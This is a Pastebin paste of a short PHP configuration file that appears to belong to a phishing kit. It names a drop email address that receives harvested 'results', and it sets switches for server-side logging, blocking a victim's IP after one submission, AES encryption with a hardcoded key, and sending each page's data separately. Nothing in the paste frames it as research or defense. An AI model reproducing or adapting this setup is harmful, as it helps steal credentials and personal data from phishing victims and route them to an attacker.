Advertisement
Guest User

Untitled

a guest
Feb 19th, 2018
331
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.77 KB | None | 0 0
  1. <?php
  2.  
  3. /*
  4. ****** Set your email below and configure functions to your requirments ****
  5. ****** FUNCTION CONTROL: 1=ON and 0=OFF ****
  6. EXAMPLE
  7. $Example=1; // Function On
  8. $Example=0; // Function Off
  9. */
  10. $Your_Email = "result.gw@yandex.com"; // Set your email
  11. $Send_Log=1; // Email results
  12. $Save_Log=0; // Saves results to server (./assets/logs/)
  13. $Abuse_Filter=0; // Block absuive text
  14. $One_Time_Access=1; // One Time Access: This blocks the users ip after the form has been submitted i.e. prevents users sending multiple fake forms
  15. $Encrypt=0; // Encrypt: This will send/save your results with aes to decrypt use the key below
  16. $Key = "582ACCD12E3D1337"; // This key is used to decrypt results and can be changed
  17. $Send_Per_Page=1; // Send each pages data seperate
  18.  
  19. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement